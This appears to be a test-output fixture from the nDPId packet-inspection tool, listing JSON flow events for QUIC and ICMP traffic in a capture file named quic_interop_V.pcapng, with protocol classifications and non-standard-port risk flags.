IrIlkoRyml5+2GM1rs54oD8r2g\/IRYK\/nACWXZam0MPohuxAwVzFm2DPO\/CDG9tPikbaQQJ4CL1YVYTEmlxoQ9Pv7hEROXIj0mcEFsLxfvk3i\/MoPNEdlZMPojdrfgNnRzJA6yfKPX5K\/72wyELeMfUX5TK9omjuekH8PMDemH7tizcp1IRb++SsVF7KvueueWBIHpAQBSSAq9XBy0TZf8oEbaLbNim2NXnJN0ydqdK11165C3ZuYLBXZ17wWk0W98DREwGS5NBlu0Tc00DkwrLpQb5NB3MtI5OLmKWDFa6CnoUpgZUGwBfpYvNy7Plbef+43kMl+CdQRcXq6yc8n75OSwD\/y7\/mKbNm9d0RnFGyJWpbnRoHCUDec1H1DKDvfNbSZoQy7tNIXS1TL8C6eCz2yjQYRcG\/1FMcDS9WIgOZcc\/XwYWdyG\/ofO0Dggh37KY
W9h3HkbNRzOsooypaKYCbYEYw7TEbJAAQAe8Q5DDQJ2bfePcKR8OaxbEKofzXVth0bN5yHwRr8V63tW3h4dZKj\/3kgOA2jAusLHo5jH15zygAdUU2cRw8zFZvtkVIlHFfTxaKLQaHfvM3AwleiBTVYGbKoe0Ecvrm7V5\/k5cjv7PBpWut3X\/4kO3JN1koKUId37exJ14XoBIXbvdQDRGAIpQqA\/3E4ZNchFWPO67spLyQi1mNM4L66nMO+WVdfkTjMkLIBJ9tIf6rrEGSEpXH3OdZSYJ0ktNMA382sgSMJxpKWNh3\/ifrCsaTSalqOhhdkcTqoyVbRILqCRvNjfjTjvE+QmnwaIBif1bOZBEG0jVu4xNul657pgD1NSHW2FuUQdTwoNB4wv8Qg89fpbnvhoGTHZhxiRCKG2GgncTuFUIdvDZ5QkmiDSJXT0esXnvPEnbrGoRzllMO\/bIv6xYj7NnBo8Z8yR92fQR4qxhoTmVhWT4chHsmwlJ2Xb\/oIquwwUPhG3k4X4tzG47Q0cfIuHqg7u4peDmvvrmXBharE8sWbxUim2Tz4SvivV50Pdu9XEH4yrAwXYDhlBSif6MTNBahEfS2UucauccXKMAyuo52Wg+BW0Z0ggU0AKQUTtoOOFfJSKIPvjIr4QLY5roTwXi6wnjxEsA5wtTJNAkmH0c5uEzIT1CJkiMBC0KIVALR\/+F3+o0+SNPJFJJxCbkDF0oeFcqPOWjK68MLlGjQAgUCdF5jV8lvO\/xcoTSL7D6OCQN51k0\/rtpaj3DWy4ytVRhikDhhdduyRjoLklRlJDny++rYKMuItl0OH31dg=="} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434587,"flow_last_seen":1603816444528,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434523,"flow_last_seen":1603816434855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} -00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434629,"flow_last_seen":1603816434766,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
-00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434507,"flow_last_seen":1603816434657,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434670,"flow_last_seen":1603816434802,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434542,"flow_last_seen":1603816444513,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434643,"flow_last_seen":1603816434794,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434569,"flow_last_seen":1603816444507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434855,"flow_last_seen":1603816434997,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434584,"flow_last_seen":1603816434709,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": 
{"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
-00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434664,"flow_last_seen":1603816444508,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434628,"flow_last_seen":1603816435041,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00861{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434628,"flow_last_seen":1603816434722,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1279,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434601,"flow_last_seen":1603816435020,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434659,"flow_last_seen":1603816434682,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434766,"flow_last_seen":1603816435089,"flow_idle_time":140000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2662,"flow_avg_l4_payload_len":665,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434586,"flow_last_seen":1603816434622,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434721,"flow_last_seen":1603816435054,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2590,"flow_avg_l4_payload_len":647,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} 
-00738{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434507,"flow_last_seen":1603816434548,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00851{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434590,"flow_last_seen":1603816434688,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00871{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434628,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434684,"flow_last_seen":1603816435089,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00868{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434652,"flow_last_seen":1603816434749,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00864{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434707,"flow_last_seen":1603816435089,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2534,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00738{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434641,"flow_last_seen":1603816435089,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
-00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434886,"flow_last_seen":1603816435111,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 